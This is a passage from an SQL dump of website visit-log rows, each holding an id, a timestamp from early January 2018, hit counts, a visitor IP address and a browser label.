54.36.148.42','other'),(193703,1514855966,1,1,0,0,'91.196.178.132','chrome'),(193704,1514856137,1,1,0,0,'54.36.148.164','other'),(193705,1514856370,1,1,0,0,'54.36.148.82','other'),(193706,1514856828,1,1,0,0,'54.36.148.163','other'),(193707,1514857035,1,1,0,0,'54.36.148.100','other'),(193708,1514857172,1,1,0,0,'51.255.71.129','other'),(193709,1514857317,1,1,0,0,'54.36.148.58','other'),(193710,1514857585,1,1,0,0,'54.36.149.8','other'),(193711,1514857681,1,0,1,0,'66.249.70.27',''),(193712,1514858379,1,1,0,0,'37.112.32.51','msie'),(193713,1514858475,1,1,0,0,'54.36.149.37','other'),(193714,1514858776,1,0,1,0,'66.249.64.30',''),(193715,1514858783,1,1,0,0,'54.36.149.101','other'),(193716,1514858840,1,1,0,0,'54.36.148.229','other'),(193717,1514859051,1,1,0,0,'54.36.149.79','other'),(193718,1514859124,1,1,0,0,'54.36.148.249','other'),(193719,1514859954,1,1,0,0,'54.36.149.51','other'),(193720,1514860317,1,1,0,0,'54.36.148.143','other'),(193721,1514860574,1,1,0,0,'54.36.148.133','other'),(193722,1514860691,1,1,0,0,'54.36.148.82','other'),(193723,1514860878,1,1,0,0,'54.36.149.85','other'),(193724,1514860943,1,1,0,0,'207.46.13.72','other'),(193725,1514861242,1,1,0,0,'66.249.70.29','chrome'),(193726,1514861279,1,1,0,0,'66.249.64.28','chrome'),(193727,1514862571,1,1,0,0,'8.29.198.25','other'),(193728,1514862662,1,1,0,0,'54.36.149.59','other'),(193729,1514862826,1,1,0,0,'54.36.149.17','other'),(193730,1514863287,1,1,0,0,'40.77.167.125','other'),(193731,1514864401,1,0,1,0,'66.249.64.28',''),(193732,1514865319,1,1,0,0,'207.46.13.161','other'),(193733,1514865415,1,1,0,0,'91.209.11.236','other'),(193734,1514865506,1,1,0,0,'54.36.149.61','other'),(193735,1514866042,1,1,0,0,'54.36.149.15','other'),(193736,1514866071,1,1,0,0,'91.196.178.163','chrome'),(193737,1514866345,1,1,0,0,'54.36.149.58','other'),(193738,1514866516,1,1,0,0,'54.36.148.198','other'),(193739,1514866664,1,1,0,0,'66.249.70.25','chrome'),(193740,1514866678,1,1,0,0,'66.249.64.28','chrome'),(193741,1514866901,1,1,0,0,'141.8.142.74','other'),(193742,1514867178,1,1,0,0,'54.36.148.188','other'),(193743,1514867459,2,2,0,0,'91.209.11.236','other'),(193744,1514867800,1,1,0,0,'54.36.148.231','other'),(193745,1514867802,1,1,0,0,'54.36.148.135','other'),(193746,1514867912,1,1,0,0,'54.36.148.62','other'),(193747,1514868099,2,2,0,0,'54.36.148.21','other'),(193748,1514868310,1,1,0,0,'54.36.149.96','other'),(193749,1514868449,1,1,0,0,'178.154.171.88','other'),(193750,1514868929,1,1,0,0,'91.209.11.236','other'),(193751,1514868997,1,1,0,0,'54.36.148.36','other'),(193752,1514869056,1,1,0,0,'157.55.39.187','other'),(193753,1514869566,1,1,0,0,'141.8.142.74','other'),(193754,1514869757,1,0,1,0,'66.249.64.29',''),(193755,1514870008,1,1,0,0,'178.154.171.88','other'),(193756,1514870497,1,0,1,0,'66.249.70.25',''),(193757,1514870844,1,1,0,0,'51.255.71.120','other'),(193758,1514871150,1,1,0,0,'54.36.149.8','other'),(193759,1514871572,1,1,0,0,'54.36.148.56','other'),(193760,1514871766,1,1,0,0,'91.124.181.110','chrome'),(193761,1514872011,1,1,0,0,'54.36.149.20','other'),(193762,1514872374,1,1,0,0,'157.55.39.121','other'),(193763,1514872449,1,1,0,0,'54.36.148.70','other'),(193764,1514872489,1,1,0,0,'54.36.148.79','other'),(193765,1514872561,1,1,0,0,'54.36.148.52','other'),(193766,1514872800,1,1,0,0,'193.106.202.238','chrome'),(193767,1514873206,1,1,0,0,'54.36.148.17','other'),(193768,1514873411,1,1,0,0,'8.29.198.26','other'),(193769,1514873643,1,0,1,0,'66.249.64.28',''),(193770,1514873760,1,1,0,0,'54.36.149.1','other'),(193771,1514874063,1,1,0,0,'54.36.148.29','other'),(193772,1514874143,1,1,0,0,'66.249.70.29','chrome'),(193773,1514874148,1,1,0,0,'66.249.64.30','chrome'),(193774,1514874911,1,1,0,0,'54.36.148.173','other'),(193775,1514874988,1,1,0,0,'54.36.148.240','other'),(193776,1514875065,1,1,0,0,'54.36.148.99','other'),(193777,1514875438,1,1,0,0,'37.73.160.171','chrome'),(193778,1514875537,1,1,0,0,'54.36.149.12','other'),(193779,1514875636,1,0,1,0,'66.249.64.29',''),(193780,1514875798,1,1,0,0,'54.36.149.73','other'),(193781,1514876442,2,2,0,0,'77.222.136.173','chrome'),(193782,1514876538,1,1,0,0,'216.244.66.237','other'),(193783,1514876934,1,1,0,0,'54.36.148.253','other'),(193784,1514876938,1,1,0,0,'54.36.148.13','other'),(193785,1514877486,2,2,0,0,'77.222.136.173','chrome'),(193786,1514877515,1,1,0,0,'54.36.148.105','other'),(193787,1514877541,1,1,0,0,'91.196.178.66','chrome'),(193788,1514877577,1,1,0,0,'51.255.71.120','other'),(193789,1514877696,1,1,0,0,'195.230.119.34','chrome'),(193790,1514877906,1,1,0,0,'37.53.241.95','chrome'),(193791,1514878312,1,0,1,0,'66.249.64.28',''),(193792,1514878424,1,1,0,0,'91.196.177.15','chrome'),(193793,1514878730,1,1,0,0,'13.56.229.65','chrome'),(193794,1514878951,1,0,1,0,'66.249.70.29',''),(193795,1514878975,1,1,0,0,'207.46.13.66','other'),(193796,1514879219,1,1,0,0,'66.249.70.29','chrome'),(193797,1514879226,1,1,0,0,'66.249.64.30','chrome'),(193798,1514880747,4,4,0,0,'195.154.146.17','other'),(193799,1514881418,1,1,0,0,'207.46.13.191','other'),(193800,1514881957,1,1,0,0,'157.55.39.109','other'),(193801,1514882144,1,1,0,0,'91.196.178.167','chrome'),(193802,1514882363,1,1,0,0,'91.196.178.70','chrome'),(193803,1514882643,1,0,1,0,'66.249.64.30',''),(193804,1514882984,1,1,0,0,'91.196.178.97','chrome'),(193805,1514884250,1,1,0,0,'8.29.198.27','other'),(193806,1514884521,1,1,0,0,'66.249.64.30','chrome'),(193807,1514884796,1,1,0,0,'66.249.70.27','chrome'),(193808,1514884935,1,1,0,0,'37.54.100.196','chrome'),(193809,1514885014,1,1,0,0,'141.8.142.74','other'),(193810,1514885158,1,1,0,0,'51.255.71.123','other'),(193811,1514885239,2,2,0,0,'91.196.178.163','chrome'),(193812,1514885574,1,1,0,0,'51.255.71.129','other'),(193813,1514885815,1,1,0,0,'54.36.148.180','other'),(193814,1514886339,1,1,0,0,'207.46.13.191','other'),(193815,1514886352,1,1,0,0,'54.36.149.9','other'),(193816,1514886695,1,1,0,0,'40.77.167.63','other'),(193817,1514886827,1,1,0,0,'54.36.149.63','other'),(193818,1514887203,1,1,0,0,'54.36.149.64','other'),(193819,1514887737,1,1,0,0,'54.36.149.81','other'),(193820,1514887855,1,1,0,0,'54.36.148.179','other'),(193821,1514887869,1,1,0,0,'54.36.149.17','other'),(193822,1514888138,1,1,0,0,'54.36.149.29','other'),(193823,1514888193,2,2,0,0,'216.244.66.237','other'),(193824,1514888287,1,0,1,0,'66.249.70.27',''),(193825,1514888372,1,1,0,0,'54.36.148.42','other'),(193826,1514888606,1,1,0,0,'54.36.148.121','other'),(193827,1514888710,1,1,0,0,'54.36.148.23','other'),(193828,1514888990,1,1,0,0,'54.36.148.124','other'),(193829,1514889062,1,1,0,0,'54.36.148.204','other'),(193830,1514889435,1,1,0,0,'54.36.148.48','other'),(193831,1514889466,1,1,0,0,'204.79.180.15','msie'),(193832,1514889780,1,1,0,0,'54.36.148.125','other'),(193833,1514889942,1,1,0,0,'95.135.121.30','chrome'),(193834,1514890010,1,1,0,0,'66.249.70.29','chrome'),(193835,1514890187,1,1,0,0,'66.249.64.30','chrome'),(193836,1514890472,1,1,0,0,'54.36.149.55','other'),(193837,1514890503,2,2,0,0,'159.89.45.37','other'),(193838,1514890552,1,1,0,0,'207.46.13.191','other'),(193839,1514890877,1,1,0,0,'54.36.148.52','other'),(193840,1514890960,1,1,0,0,'54.36.148.203','other'),(193841,1514891128,1,1,0,0,'54.36.148.29','other'),(193842,1514891468,1,0,1,0,'66.249.64.28',''),(193843,1514891836,1,1,0,0,'40.77.167.4','other'),(193844,1514892002,1,1,0,0,'54.36.148.144','other'),(193845,1514892089,1,1,0,0,'188.230.43.254','chrome'),(193846,1514892106,2,2,0,0,'188.230.43.254','other'),(193847,1514892489,1,1,0,0,'91.196.178.168','chrome'),(193848,1514892511,1,1,0,0,'91.196.178.165','chrome'),(193849,1514893209,1,1,0,0,'54.36.148.136','other'),(193850,1514893331,1,1,0,0,'141.8.142.74','other'),(193851,1514893476,1,1,0,0,'157.55.39.10','other'),(193852,1514893656,1,1,0,0,'207.46.13.17','other'),(193853,1514893894,1,1,0,0,'54.36.148.121','other'),(193854,1514894064,1,1,0,0,'54.36.149.98','other'),(193855,1514894569,1,1,0,0,'54.36.148.246','other'),(193856,1514895080,1,1,0,0,'8.29.198.27','other'),(193857,1514895202,1,1,0,0,'54.36.148.99','other'),(193858,1514895279,1,1,0,0,'54.36.149.66','other'),(193859,1514895337,1,1,0,0,'54.36.148.79','other'),(193860,1514895521,1,1,0,0,'188.230.43.254','other'),(193861,1514895659,1,1,0,0,'66.249.64.29','chrome'),(193862,1514895736,1,1,0,0,'66.249.70.25','chrome'),(193863,1514896651,1,1,0,0,'54.36.148.54','other'),(193864,1514896726,1,1,0,0,'54.36.148.103','other'),(193865,1514897250,1,1,0,0,'91.196.178.65','firefox'),(193866,1514897340,1,1,0,0,'128.72.225.101','chrome'),(193867,1514897409,1,1,0,0,'54.36.148.21','other'),(193868,1514897615,1,1,0,0,'37.52.111.51','chrome'),(193869,1514897783,1,1,0,0,'54.36.148.59','other'),(193870,1514897929,1,1,0,0,'91.196.178.168','chrome'),(193871,1514898052,1,1,0,0,'87.250.224.46','other'),(193872,1514898608,1,1,0,0,'146.120.100.2','chrome'),(193873,1514898912,1,1,0,0,'40.77.167.131','other'),(193874,1514899009,1,1,0,0,'54.36.148.125','other'),(193875,1514899077,1,1,0,0,'54.36.148.45','other'),(193876,1514899644,1,1,0,0,'194.44.211.114','chrome'),(193877,1514899744,1,1,0,0,'91.196.177.46','other'),(193878,1514899814,2,2,0,0,'46.9.164.75','other'),(193879,1514900151,1,1,0,0,'141.8.142.74','other'),(193880,1514900176,1,1,0,0,'37.52.115.215','chrome'),(193881,1514900236,1,0,1,0,'66.249.64.28',''),(193882,1514900321,1,0,1,0,'66.249.70.25',''),(193883,1514900413,2,2,0,0,'95.134.110.224','firefox'),(193884,1514900424,1,1,0,0,'178.154.171.88','other'),(193885,1514900550,1,1,0,0,'54.36.148.66','other'),(193886,1514900631,1,1,0,0,'54.36.149.43','other'),(193887,1514900658,1,1,0,0,'54.36.148.108','other'),(193888,1514900707,1,1,0,0,'66.249.64.28','chrome'),(193889,1514900753,1,1,0,0,'66.249.70.25','chrome'),(193890,1514902110,1,1,0,0,'40.77.167.46','other'),(193891,1514902144,1,1,0,0,'91.196.178.163','chrome'),(193892,1514902155,1,1,0,0,'54.36.148.188','other'),(193893,1514902206,1,1,0,0,'54.36.149.82','other'),(193894,1514902210,1,1,0,0,'91.196.178.70','chrome'),(193895,1514902767,1,1,0,0,'194.79.11.98','chrome'),(193896,1514903389,1,1,0,0,'54.36.148.64','other'),(193897,1514903601,1,1,0,0,'95.132.17.51','firefox'),(193898,1514903692,1,1,0,0,'91.196.178.70','chrome'),(193899,1514903846,1,1,0,0,'213.108.45.138','chrome'),(193900,1514903896,1,1,0,0,'207.46.13.0','other'),(193901,1514903986,1,1,0,0,'188.230.43.254','other'),(193902,1514904115,1,1,0,0,'54.36.148.232','other'),(193903,1514904136,1,1,0,0,'54.36.148.108','other'),(193904,1514904300,1,1,0,0,'141.8.132.19','other'),(193905,1514904417,1,1,0,0,'54.36.148.137','other'),(193906,1514904508,1,1,0,0,'95.134.110.224','firefox'),(193907,1514904520,1,1,0,0,'54.36.149.102','other'),(193908,1514904551,1,1,0,0,'54.36.149.63','other'),(193909,1514904766,1,1,0,0,'54.36.148.165','other'),(193910,1514905103,1,0,1,0,'66.249.64.29',''),(193911,1514905128,1,1,0,0,'54.36.148.232','other'),(193912,1514905202,1,1,0,0,'54.36.148.244','other'),(193913,1514905269,1,1,0,0,'91.196.178.70','chrome'),(193914,1514905330,1,1,0,0,'54.36.148.102','other'),(193915,1514905441,1,1,0,0,'54.36.149.36','other'),(193916,1514905477,1,0,1,0,'66.249.64.28',''),(193917,1514905483,1,1,0,0,'54.36.149.30','other'),(193918,1514905748,1,1,0,0,'51.255.71.125','other'),(193919,1514905912,1,1,0,0,'8.29.198.25','other'),(193920,1514906084,1,1,0,0,'54.36.149.35','other'),(193921,1514906161,1,1,0,0,'66.249.64.28','chrome'),(193922,1514906178,1,1,0,0,'66.249.70.25','chrome'),(193923,1514906282,1,1,0,0,'35.225.221.87','other'),(193924,1514906512,1,1,0,0,'207.46.13.92','other'),(193925,1514906542,1,1,0,0,'51.255.71.119','other'),(193926,1514906558,1,1,0,0,'207.46.13.16','other'),(193927,1514906664,1,1,0,0,'54.36.149.29','other'),(193928,1514906890,1,1,0,0,'146.185.223.221','chrome'),(193929,1514906985,1,1,0,0,'188.230.43.254','other'),(193930,1514907119,1,1,0,0,'54.36.148.132','other'),(193931,1514907355,2,2,0,0,'207.46.13.57','other'),(193932,1514907550,1,1,0,0,'37.73.245.238','chrome'),(193933,1514909109,1,0,1,0,'66.249.64.28',''),(193934,1514909165,1,1,0,0,'54.36.148.75','other'),(193935,1514909211,1,1,0,0,'54.36.148.22','other'),(193936,1514909311,1,1,0,0,'54.36.148.35','other'),(193937,1514909359,1,1,0,0,'54.36.148.50','other'),(193938,1514909498,1,1,0,0,'91.196.178.135','firefox'),(193939,1514909819,1,1,0,0,'188.230.43.254','other'),(193940,1514909982,1,1,0,0,'51.255.71.133','other'),(193941,1514910303,1,1,0,0,'199.58.86.209','other'),(193942,1514910334,1,1,0,0,'91.196.178.166','chrome'),(193943,1514910642,1,1,0,0,'141.8.142.74','other'),(193944,1514911021,1,1,0,0,'54.36.148.48','other'),(193945,1514911039,2,2,0,0,'35.225.221.87','other'),(193946,1514911066,1,1,0,0,'95.132.132.104','chrome'),(193947,1514911080,1,0,1,0,'66.249.70.27',''),(193948,1514911177,1,1,0,0,'54.36.148.251','other'),(193949,1514911208,1,1,0,0,'54.36.148.145','other'),(193950,1514911240,1,1,0,0,'54.36.148.123','other'),(193951,1514911496,1,1,0,0,'66.249.64.30','chrome'),(193952,1514911519,1,1,0,0,'66.249.70.25','chrome'),(193953,1514911530,1,1,0,0,'54.36.148.16','other'),(193954,1514911702,1,1,0,0,'178.158.223.88','chrome'),(193955,1514911710,1,1,0,0,'46.149.186.26','chrome'),(193956,1514911738,1,1,0,0,'207.46.13.16','other'),(193957,1514911994,1,1,0,0,'54.36.148.157','other'),(193958,1514912040,1,1,0,0,'54.36.149.106','other'),(193959,1514912215,1,1,0,0,'188.230.43.254','other'),(193960,1514912240,1,1,0,0,'54.36.148.198','other'),(193961,1514912339,1,1,0,0,'107.167.116.25','other'),(193962,1514912435,1,1,0,0,'54.36.148.103','other'),(193963,1514912695,1,1,0,0,'46.149.186.26','chrome'),(193964,1514912720,1,0,1,0,'66.249.64.28',''),(193965,1514912736,1,1,0,0,'141.8.142.74','other'),(193966,1514913060,1,1,0,0,'54.36.148.235','other'),(193967,1514913177,1,1,0,0,'46.201.45.186','firefox'),(193968,1514913635,1,1,0,0,'54.36.148.144','other'),(193969,1514913873,2,1,1,0,'66.249.64.29',''),(193970,1514914627,1,1,0,0,'188.230.43.254','other'),(193971,1514914827,1,1,0,0,'176.67.28.96','chrome'),(193972,1514915127,1,1,0,0,'54.36.149.17','other'),(193973,1514915192,1,1,0,0,'92.113.126.60','chrome'),(193974,1514915212,1,1,0,0,'35.225.221.87','other'),(193975,1514915465,1,1,0,0,'94.178.116.54','chrome'),(193976,1514915586,1,1,0,0,'176.8.141.224','chrome'),(193977,1514916239,1,1,0,0,'54.36.148.180','other'),(193978,1514916293,1,1,0,0,'46.211.153.125','other'),(193979,1514916331,1,1,0,0,'54.36.149.23','other'),(193980,1514916486,1,1,0,0,'66.249.64.29','chrome'),(193981,1514916532,1,1,0,0,'66.249.70.25','chrome'),(193982,1514916581,1,1,0,0,'54.36.148.37','other'),(193983,1514916752,1,1,0,0,'8.29.198.26','other'),(193984,1514916854,1,1,0,0,'54.36.149.1','other'),(193985,1514917071,1,1,0,0,'54.36.148.68','other'),(193986,1514917186,1,1,0,0,'207.46.13.57','other'),(193987,1514917237,1,1,0,0,'54.36.148.141','other'),(193988,1514917269,1,1,0,0,'54.36.148.198','other'),(193989,1514917691,1,1,0,0,'46.133.116.101','chrome'),(193990,1514917899,1,1,0,0,'54.36.148.178','other'),(193991,1514918192,2,2,0,0,'141.8.142.74','other'),(193992,1514918296,1,1,0,0,'91.196.178.134','chrome'),(193993,1514918350,1,1,0,0,'51.255.71.130','other'),(193994,1514918603,1,1,0,0,'54.36.148.27','other'),(193995,1514918687,1,1,0,0,'165.227.198.160','chrome'),(193996,1514918921,1,1,0,0,'54.36.148.120','other'),(193997,1514918970,1,1,0,0,'91.196.179.134','chrome'),(193998,1514919098,1,1,0,0,'37.73.136.45','chrome'),(193999,1514919335,1,1,0,0,'54.36.149.82','other'),(194000,1514919353,1,1,0,0,'54.36.148.150','other'),(194001,1514919386,1,1,0,0,'54.36.149.89','other'),(194002,1514919634,1,1,0,0,'207.46.13.16','other'),(194003,1514919822,1,1,0,0,'178.154.171.88','other'),(194004,1514920146,1,0,1,0,'66.249.64.28',''),(194005,1514920410,1,1,0,0,'54.36.148.71','other'),(194006,1514920526,1,0,1,0,'66.249.70.27',''),(194007,1514920705,1,1,0,0,'54.36.149.18','other'),(194008,1514921055,1,1,0,0,'54.36.148.183','other'),(194009,1514921129,1,1,0,0,'91.124.182.91','chrome'),(194010,1514921352,2,0,2,0,'66.249.64.29',''),(194011,1514922211,1,1,0,0,'51.255.71.131','other'),(194012,1514922242,1,1,0,0,'54.36.149.54','other'),(194013,1514922287,1,1,0,0,'54.36.148.201','other'),(194014,1514922361,1,1,0,0,'66.249.64.28','chrome'),(194015,1514922385,1,1,0,0,'66.249.70.27','chrome'),(194016,1514922790,1,1,0,0,'91.196.178.65','chrome'),(194017,1514922896,1,1,0,0,'51.255.71.118','other'),(194018,1514923536,1,1,0,0,'54.36.148.87','other'),(194019,1514923653,1,1,0,0,'54.36.149.8','other'),(194020,1514923670,1,1,0,0,'207.46.13.57','other'),(194021,1514923721,1,1,0,0,'91.196.178.69','firefox'),(194022,1514923805,1,1,0,0,'54.36.148.93','other'),(194023,1514923871,1,1,0,0,'54.36.149.82','other'),(194024,1514923945,1,1,0,0,'54.36.148.99','other'),(194025,1514924020,1,1,0,0,'91.196.178.68','firefox'),(194026,1514924253,1,1,0,0,'54.36.148.22','other'),(194027,1514924256,1,1,0,0,'54.36.148.207','other'),(194028,1514924340,1,1,0,0,'54.36.149.1','other'),(194029,1514924383,1,1,0,0,'54.36.149.21','other'),(194030,1514924448,1,1,0,0,'54.36.148.76','other'),(194031,1514924897,1,1,0,0,'54.36.149.97','other'),(194032,1514924961,1,1,0,0,'54.36.149.84','other'),(194033,1514925073,1,1,0,0,'54.36.148.31','other'),(194034,1514925299,1,1,0,0,'54.36.149.52','other'),(194035,1514925676,1,1,0,0,'54.36.149.106','other'),(194036,1514925851,2,2,0,0,'141.8.142.74','other'),(194037,1514926112,1,1,0,0,'176.8.141.224','chrome'),(194038,1514926135,1,1,0,0,'54.36.149.58','other'),(194039,1514926140,1,1,0,0,'51.255.71.114','other'),(194040,1514926433,1,1,0,0,'54.36.148.205','other'),(194041,1514926839,1,1,0,0,'54.36.148.181','other'),(194042,1514926939,1,1,0,0,'54.36.148.125','other'),(194043,1514926955,1,1,0,0,'66.249.64.30','chrome'),(194044,1514926979,1,1,0,0,'66.249.64.29','chrome'),(194045,1514927165,1,1,0,0,'141.8.142.74','other'),(194046,1514927265,1,1,0,0,'54.36.148.117','other'),(194047,1514927597,1,1,0,0,'8.29.198.26','other'),(194048,1514927664,1,1,0,0,'54.36.148.183','other'),(194049,1514927736,1,1,0,0,'54.36.148.73','other'),(194050,1514927856,1,1,0,0,'54.36.148.247','other'),(194051,1514927942,1,0,1,0,'66.249.64.29',''),(194052,1514928008,1,1,0,0,'54.36.148.68','other'),(194053,1514928045,1,1,0,0,'54.36.149.83','other'),(194054,1514928251,1,1,0,0,'54.36.149.79','other'),(194055,1514928405,1,1,0,0,'66.249.64.30','chrome'),(194056,1514928423,1,1,0,0,'66.249.70.25','chrome'),(194057,1514928529,1,1,0,0,'141.8.132.19','other'),(194058,1514928794,1,1,0,0,'54.36.148.137','other'),(194059,1514929504,1,1,0,0,'54.36.148.241','other'),(194060,1514929697,1,1,0,0,'54.36.148.31','other'),(194061,1514929966,1,1,0,0,'54.36.149.63','other'),(194062,1514930146,1,0,1,0,'66.249.70.29',''),(194063,1514932104,1,1,0,0,'54.36.148.231','other'),(194064,1514932161,1,1,0,0,'54.36.148.148','other'),(194065,1514932469,1,1,0,0,'66.249.64.30','chrome'),(194066,1514932557,1,1,0,0,'54.36.148.93','other'),(194067,1514933022,2,2,0,0,'54.165.59.7','other'),(194068,1514933286,1,1,0,0,'54.36.148.118','other'),(194069,1514933779,1,1,0,0,'54.36.148.157','other'),(194070,1514933840,1,1,0,0,'54.36.148.169','other'),(194071,1514933910,1,1,0,0,'51.255.71.120','other'),(194072,1514934248,1,1,0,0,'54.36.148.67','other'),(194073,1514934382,1,1,0,0,'66.249.64.29','chrome'),(194074,1514934395,1,1,0,0,'66.249.70.29','chrome'),(194075,1514934581,2,2,0,0,'54.165.59.7','other'),(194076,1514934705,1,1,0,0,'58.124.172.52','other'),(194077,1514934901,1,1,0,0,'120.32.209.130','other'),(194078,1514934905,1,1,0,0,'103.74.246.13','other'),(194079,1514934948,1,1,0,0,'54.36.149.18','other'),(194080,1514935169,1,1,0,0,'74.115.214.150','other'),(194081,1514935501,1,1,0,0,'54.36.149.86','other'),(194082,1514935974,1,1,0,0,'54.36.149.57','other'),(194083,1514936301,2,2,0,0,'54.165.59.7','other'),(194084,1514937252,1,1,0,0,'54.36.148.106','other'),(194085,1514937329,1,1,0,0,'54.36.148.174','other'),(194086,1514937566,1,1,0,0,'54.36.149.3','other'),(194087,1514938133,1,1,0,0,'54.36.149.50','other'),(194088,1514938412,1,0,1,0,'66.249.70.25',''),(194089,1514938431,1,1,0,0,'8.29.198.26','other'),(194090,1514938654,2,1,1,0,'66.249.64.28',''),(194091,1514938660,1,1,0,0,'66.249.70.27','chrome'),(194092,1514939073,1,1,0,0,'54.36.148.62','other'),(194093,1514939130,1,1,0,0,'54.36.148.26','other'),(194094,1514939601,1,1,0,0,'54.36.148.76','other'),(194095,1514940380,1,1,0,0,'54.36.149.64','other'),(194096,1514940941,1,0,1,0,'66.249.64.29',''),(194097,1514941100,1,1,0,0,'54.36.148.113','other'),(194098,1514942064,1,1,0,0,'54.36.149.2','other'),(194099,1514942255,1,1,0,0,'54.36.148.14','other'),(194100,1514942984,1,1,0,0,'54.36.149.34','other'),(194101,1514942992,1,1,0,0,'54.36.148.69','other'),(194102,1514943372,1,1,0,0,'54.36.149.7','other'),(194103,1514943524,1,1,0,0,'54.36.149.60','other'),(194104,1514943888,1,1,0,0,'66.249.64.30','chrome'),(194105,1514943983,1,1,0,0,'66.249.70.29','chrome'),(194106,1514944186,1,1,0,0,'54.36.148.171','other'),(194107,1514944877,1,1,0,0,'88.150.250.242','chrome'),(194108,1514944919,1,1,0,0,'157.55.39.112','other'),(194109,1514944927,1,0,1,0,'66.249.64.28',''),(194110,1514944964,1,1,0,0,'54.36.149.53','other'),(194111,1514945651,1,1,0,0,'54.36.149.40','other'),(194112,1514945818,1,1,0,0,'54.36.148.160','other'),(194113,1514946022,1,1,0,0,'54.36.149.49','other'),(194114,1514946140,1,0,1,0,'66.249.64.29',''),(194115,1514946175,1,0,1,0,'66.249.64.28',''),(194116,1514946283,1,1,0,0,'54.36.149.80','other'),(194117,1514946753,1,1,0,0,'54.36.148.173','other'),(194118,1514947184,2,2,0,0,'216.244.66.237','other'),(194119,1514947397,1,1,0,0,'51.255.71.117','other'),(194120,1514947706,1,1,0,0,'54.36.148.75','other'),(194121,1514947778,1,1,0,0,'54.36.148.73','other'),(194122,1514948231,2,2,0,0,'69.30.226.234','other'),(194123,1514948552,1,1,0,0,'54.36.149.19','other'),(194124,1514948865,1,0,1,0,'66.249.64.29',''),(194125,1514948871,2,2,0,0,'54.36.148.236','other'),(194126,1514948924,1,0,1,0,'66.249.70.25',''),(194127,1514948945,1,1,0,0,'54.36.148.84','other'),(194128,1514948953,1,1,0,0,'54.36.148.147','other'),(194129,1514949136,1,1,0,0,'54.36.148.198','other'),(194130,1514949275,1,1,0,0,'8.29.198.26','other'),(194131,1514949290,1,1,0,0,'54.36.148.51','other'),(194132,1514949414,1,1,0,0,'66.249.64.28','chrome'),(194133,1514949431,1,1,0,0,'66.249.70.29','chrome'),(194134,1514950575,1,1,0,0,'54.36.149.15','other'),(194135,1514950775,1,1,0,0,'54.36.148.52','other'),(194136,1514950989,1,1,0,0,'54.36.149.58','other'),(194137,1514951132,1,1,0,0,'54.36.148.163','other'),(194138,1514951138,1,1,0,0,'95.24.20.115','msie'),(194139,1514952116,1,1,0,0,'54.36.149.29','other'),(194140,1514952164,1,1,0,0,'54.36.148.75','other'),(194141,1514952280,1,1,0,0,'54.36.148.96','other'),(194142,1514952533,1,1,0,0,'54.36.148.183','other'),(194143,1514953212,1,1,0,0,'54.36.148.59','other'),(194144,1514953263,1,0,1,0,'66.249.69.99',''),(194145,1514954592,1,1,0,0,'54.36.149.5','other'),(194146,1514954829,1,1,0,0,'66.249.69.99','chrome'),(194147,1514954863,1,1,0,0,'66.249.69.59','chrome'),(194148,1514954913,1,1,0,0,'35.226.23.240','other'),(194149,1514955099,1,1,0,0,'54.36.148.171','other'),(194150,1514956151,1,0,1,0,'66.249.69.59',''),(194151,1514956817,1,1,0,0,'54.36.148.160','other'),(194152,1514956998,1,1,0,0,'54.36.148.155','other'),(194153,1514957234,1,1,0,0,'54.36.148.174','other'),(194154,1514957428,1,1,0,0,'157.55.39.229','other'),(194155,1514957723,1,0,1,0,'66.249.69.105',''),(194156,1514957753,1,0,1,0,'66.249.69.99',''),(194157,1514957772,1,1,0,0,'54.36.148.28','other'),(194158,1514957852,1,1,0,0,'54.36.148.126','other'),(194159,1514957968,1,1,0,0,'188.230.43.254','other'),(194160,1514958226,1,0,1,0,'66.249.69.103',''),(194161,1514958313,1,1,0,0,'54.36.149.54','other'),(194162,1514958559,1,1,0,0,'54.36.148.245','other'),(194163,1514958628,1,1,0,0,'54.36.149.16','other'),(194164,1514958889,1,1,0,0,'54.36.148.36','other'),(194165,1514959062,1,1,0,0,'54.36.148.203','other'),(194166,1514959169,1,1,0,0,'66.249.69.59','chrome'),(194167,1514959208,1,1,0,0,'54.36.149.78','other'),(194168,1514959463,2,0,2,0,'66.249.69.99',''),(194169,1514959657,1,1,0,0,'54.36.149.47','other'),(194170,1514960067,1,1,0,0,'54.36.149.45','other'),(194171,1514960121,1,1,0,0,'8.29.198.27','other'),(194172,1514960205,1,1,0,0,'91.196.178.71','firefox'),(194173,1514960390,1,1,0,0,'188.230.43.254','other'),(194174,1514960728,1,1,0,0,'54.36.149.103','other'),(194175,1514960925,1,1,0,0,'54.36.149.64','other'),(194176,1514960989,1,0,1,0,'66.249.69.103',''),(194177,1514961247,1,1,0,0,'51.255.71.126','other'),(194178,1514961798,1,1,0,0,'54.36.148.26','other'),(194179,1514962062,1,1,0,0,'54.36.148.48','other'),(194180,1514962506,1,1,0,0,'180.76.15.32','other'),(194181,1514962665,1,1,0,0,'54.36.148.30','other'),(194182,1514962762,1,1,0,0,'91.196.178.70','chrome'),(194183,1514962784,1,1,0,0,'66.249.69.99','chrome'),(194184,1514962975,1,0,1,0,'66.249.69.61',''),(194185,1514962987,1,0,1,0,'66.249.69.59',''),(194186,1514962992,1,1,0,0,'54.36.149.95','other'),(194187,1514963321,1,1,0,0,'54.36.148.13','other'),(194188,1514963332,1,1,0,0,'54.36.148.65','other'),(194189,1514963335,1,1,0,0,'176.113.170.104','chrome'),(194190,1514963425,1,1,0,0,'66.249.69.57','chrome'),(194191,1514963846,1,1,0,0,'54.36.148.255','other'),(194192,1514963859,1,1,0,0,'54.36.149.67','other'),(194193,1514964219,1,1,0,0,'54.36.148.119','other'),(194194,1514964451,1,1,0,0,'54.36.148.154','other'),(194195,1514964997,1,1,0,0,'54.36.148.160','other'),(194196,1514965521,1,1,0,0,'54.36.148.36','other'),(194197,1514966214,2,2,0,0,'91.196.178.68','chrome'),(194198,1514966292,1,0,1,0,'66.249.69.105',''),(194199,1514966327,1,0,1,0,'66.249.69.103',''),(194200,1514966440,1,1,0,0,'54.36.148.43','other'),(194201,1514966692,1,1,0,0,'54.36.148.23','other'),(194202,1514966733,1,1,0,0,'54.36.148.180','other'),(194203,1514966767,1,1,0,0,'54.36.149.92','other'),(194204,1514966924,1,1,0,0,'54.36.148.159','other'),(194205,1514967259,1,1,0,0,'91.196.178.166','chrome'),(194206,1514967266,1,0,1,0,'66.249.69.57',''),(194207,1514967820,1,1,0,0,'54.36.148.88','other'),(194208,1514967847,1,1,0,0,'54.36.148.50','other'),(194209,1514967866,1,1,0,0,'51.255.71.130','other'),(194210,1514967938,1,1,0,0,'185.175.94.250','firefox'),(194211,1514967955,1,1,0,0,'54.36.148.207','other'),(194212,1514967988,1,0,1,0,'66.249.69.103',''),(194213,1514968072,2,2,0,0,'88.99.19.242','